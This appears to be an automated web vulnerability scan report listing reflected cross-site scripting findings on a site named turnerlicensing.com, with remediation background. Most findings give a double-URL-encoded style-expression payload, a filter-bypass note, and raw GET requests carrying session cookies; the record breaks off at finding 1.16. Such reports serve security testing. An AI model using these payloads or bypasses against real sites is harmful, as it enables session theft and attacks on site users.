Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.2. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/11x17_recordable_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.3. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/11x17_sound_message_centers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.4. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/2_year_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.5. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/3_ring_binders
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_ring_binders?83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.6. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/3_subject_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f63ec'style='x:expression(alert(1))'5164698b3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3_subject_notebooks?f63ec%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275164698b3fe=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.7. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/5x8_notepads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bbd7'style='x:expression(alert(1))'3ded6a6acc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_notepads?1bbd7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273ded6a6acc=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.8. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/5x8_planners
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dec49'style='x:expression(alert(1))'b65b930df92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /5x8_planners?dec49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b65b930df92=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.9. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/MLB
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8600f'style='x:expression(alert(1))'40335c5bc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /MLB?8600f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252740335c5bc15=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.10. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1530%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b802c6ba968 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1530'style='x:expression(alert(1))'b802c6ba968 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.11. http://www.turnerlicensing.com/NBA/atlanta_hawks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/atlanta_hawks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15c9e'style='x:expression(alert(1))'9a17b92c195 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/atlanta_hawks?15c9e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279a17b92c195=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.12. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7e246%20style%3dx%3aexpression(alert(1))%20ac33b6d3649 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e246 style=x:expression(alert(1)) ac33b6d3649 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
1.13. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d38e8'style='x:expression(alert(1))'8d6ba417d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics?d38e8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d6ba417d1b=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.14. http://www.turnerlicensing.com/NBA/boston_celtics/8010782 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics/8010782
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32b5b'style='x:expression(alert(1))'f3631ec12da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8010782?32b5b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f3631ec12da=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.15. http://www.turnerlicensing.com/NBA/boston_celtics/8090823 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics/8090823
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1f23'style='x:expression(alert(1))'784b725bfc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/boston_celtics/8090823?d1f23%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527784b725bfc1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.16. http://www.turnerlicensing.com/NBA/boston_celtics/8120527 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/NBA/boston_celtics/8120527
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f1c8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713f6993aa6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f1c8'style='x:expression(alert(1))'13f6993aa6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
